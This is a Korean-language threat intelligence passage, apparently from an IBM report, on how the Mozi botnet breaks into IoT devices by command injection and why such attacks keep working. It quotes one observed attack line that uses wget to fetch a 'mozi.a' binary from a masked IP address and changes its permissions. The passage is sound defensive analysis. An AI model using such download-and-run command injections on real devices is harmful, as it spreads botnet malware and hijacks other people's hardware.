IBM이 관찰한 거의 모든 IoT 공격 대상은 CMDi 공격을 사용하여 디바이스에 대한 초기 액세스 권한을 얻으려고 시도했습니다. 대상 엔드포인트가 IoT 디바이스이고 이러한 공격에 취약한 경우 페이로드가 다운로드되어 실행된 것입니다.

CMDi 공격은 여러 가지 이유로 IoT 디바이스에 대해 매우 인기가 있습니다. 첫째, IoT 임베디드 시스템에는 일반적으로 펌웨어 개발 과정에서 악용될 수 있는 웹 인터페이스와 디버깅 인터페이스가 포함되어 있습니다. 둘째, IoT 웹 인터페이스에 내장된 PHP 모듈을 악용하여 악의적인 행위자에게 원격 실행 기능을 제공할 수 있습니다. 셋째, 관리자가 예상 원격 입력을 삭제하여 인터페이스를 강화하지 못하기 때문에 IoT 인터페이스는 배포 시 취약한 상태로 남는 경우가 많습니다. 이를 통해 위협 행위자는 "wget"과 같은 셸 명령을 입력할 수 있습니다.

분석 결과 Mozi 봇넷은 “wget” 셸 명령을 사용한 다음 위협 행위자가 영향을 받는 시스템과 상호 작용할 수 있도록 권한을 변경하는 방식으로 CMDi를 활용하는 것으로 나타났습니다. 예를 들면 다음과 같습니다.

wget http://xxx.xx.xxx.xxx/bins/mozi.a -o /var/tmp/mozi.a; chmod 777 /var/tmp/mozi.a; rm -rf /var/tmp/mozi.a

호스트가 CMDi에 취약한 경우 이 명령은 "mozi.a"라는 파일을 다운로드하여 실행합니다. 이 특정 샘플에 대한 분석에 따르면 파일은 연동 파이프라인 스테이지(MIPS) 아키텍처 없이 마이크로프로세서에서 실행됩니다. 이는 많은 IoT 디바이스에서 널리 사용되는 축소된 명령 집합 컴퓨터(RISC) 아키텍처를 실행하는 시스템에서 이해할 수 있는 확장입니다. 공격자가 봇넷을 통해 디바이스에 대한 전체 액세스 권한을 얻으면 펌웨어 수준을 변경할 수 있으며 디바이스에 추가 멀웨어를 심을 수 있습니다.

이 예에서는 잘 알려진 벡터를 인용하고 있지만, 두 가지 주요 이유로 이 벡터가 계속 효과적일 수 있습니다. 첫째, 새로운 취약점으로 인해 CMDi를 통해 악용 시도가 지속적으로 업데이트될 수 있으며, 느린 패치 구현이 악용될 수 있습니다. 둘째, 이 활동은 쉽게 자동화되어 위협 행위자가 저렴한 비용으로 다양한 디바이스를 빠르게 공격할 수 있습니다.

Mozi 봇넷 인프라는 주로 중국에서 공급되는 것으로 보이며, 관찰된 인프라의 84%를 차지합니다. 이 사실은 2020년 IoT 활동에 대한 다른 오픈소스 연구와 일치합니다.

다음은 IBM이 Mozi 봇넷의 악용 시도를 관찰한 취약점 목록입니다.